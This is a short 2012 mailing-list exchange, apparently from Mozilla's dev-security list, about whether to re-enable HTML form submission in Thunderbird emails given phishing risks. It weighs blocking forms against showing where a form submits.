Hi Mark, Email phishing via HTML forms is not uncommon now but usually done via attachments. Being able to do it inline within the email probably would not help the situation any. :) Lucas.
On 2/24/2012 2:09 AM, Mark Banner wrote: > Since Thunderbird 2, we've had a bug on file [1] where forms in email can't > be submitted. This was due to how we > changed our content handling to allow tabs that can view web pages. > > Whilst I think we could fix this, the more I think about it, the more I am > concerned about the security implications > of forms in emails. > > I think the biggest concern is from phishing attacks - e.g. a user receives > an email with form elements due to their > bank having issues and needing to log in. > > With no indication of where the submission is going to, the user could be at > serious risk. > > I should note, this is only a problem where the user selects to view > "Original HTML". Viewing plain text or "Simple > HTML" isn't an issue. > > So I don't think it is right to "fix" form handling to just work as it used > to, but I'm not sure about the way forward. > > I can see a couple of options: > > - Don't allow the display of the form at all, even in original html mode. > - Somehow hook into the form submission, or the email display and indicate > where the form will be submitted to. > > I'm not sure if the latter is possible, or sensible from a security > perspective. > > Does anyone else have any ideas, suggestions, comments? > > Mark. > > [1] https://bugzilla.mozilla.org/show_bug.cgi?id=533545 > _______________________________________________ > dev-security mailing list > dev-security@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-security _______________________________________________ dev-security mailing list dev-security@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-security